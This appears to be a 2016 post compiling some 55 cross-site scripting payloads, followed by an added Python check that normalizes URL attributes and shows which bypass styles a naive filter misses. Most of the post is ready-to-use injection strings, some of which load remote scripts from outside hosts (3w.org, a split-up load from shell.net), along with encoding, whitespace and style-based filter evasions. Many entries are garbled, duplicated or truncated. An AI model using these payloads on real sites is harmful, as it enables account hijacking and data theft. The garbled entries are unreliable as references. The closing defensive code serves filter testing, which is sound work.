XSS Attack Compilation

Posted 2016-4-28 10:06:15
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolons or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..[omitted]..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..[omitted]..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters have basically no effect domestically, since there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with leading spaces and meta characters
<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) JavaScript escape-character filtering
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with linked URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>

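Added defensive example, not part of the original post: a Python check that normalizes a URL attribute the way browsers do (decoding character references with or without semicolons, dropping NUL and embedded tab/LF/CR, trimming edge whitespace, folding case) before inspecting its scheme, and that shows which of the styles in the list above a raw substring filter lets through. Item numbers in the comments refer to this list; the sample values and example.com are constructed placeholders.

```python
import html
import re

# Browser URL parsers drop ASCII tab/LF/CR anywhere in the value and trim C0
# controls and spaces from both ends (WHATWG URL); a filter must do the same.
_TAB_NEWLINE = re.compile(r"[\t\n\r]")
_EDGE_CONTROLS = re.compile(r"^[\x00-\x20]+|[\x00-\x20]+$")
_SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):")
SCRIPT_SCHEMES = {"javascript", "vbscript"}
ALLOWED_SCHEMES = {"http", "https", None}  # None: relative URL, no scheme

def normalize_url_attr(value: str) -> str:
    # Decode character references, semicolon or not (items 5, 9, 10); drop NUL
    # bytes legacy parsers ignored (17); strip tab/LF/CR (11-14); trim edges (19).
    decoded = html.unescape(value).replace("\x00", "")
    return _EDGE_CONTROLS.sub("", _TAB_NEWLINE.sub("", decoded))

def url_scheme(value: str):
    # Lowercased scheme after normalization (defeats item 4), None if relative.
    match = _SCHEME.match(normalize_url_attr(value))
    return match.group(1).lower() if match else None

def naive_filter_blocks(value: str) -> bool:
    # The raw substring check these payloads are written to slip past.
    return "javascript:" in value.lower()

def is_script_url(value: str) -> bool:
    # Blocklist, but applied to the normalized scheme rather than the raw text.
    return url_scheme(value) in SCRIPT_SCHEMES

def is_allowed_url(value: str) -> bool:
    # Allowlist, the preferable check: relative and http(s) URLs only.
    return url_scheme(value) in ALLOWED_SCHEMES

# Constructed samples modelled on the list's bypass styles; alert() is a
# harmless placeholder. True marks values a browser treats as a script URL.
SAMPLES = {
    "JaVaScRiPt:alert('XSS')": True,                  # item 4
    "jav&#x09;ascript:alert('XSS')": True,            # item 12, encoded tab
    "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58alert(1)": True,  # items 9/10
    "   javascript:alert('XSS')": True,               # item 19
    "java\x00script:alert('XSS')": True,              # item 17
    "http://example.com/logo.png": False,
    "/static/logo.png": False,
}

def missed_by_naive_filter(samples=SAMPLES):
    # Script URLs the raw substring check lets through but normalization catches.
    return [s for s, is_script in samples.items()
            if is_script and is_script_url(s) and not naive_filter_blocks(s)]
```

The normalization is deliberately more aggressive than any single browser (it also strips NUL), which is the right direction for a filter; the allowlist form is still preferable because it needs no knowledge of which schemes are dangerous.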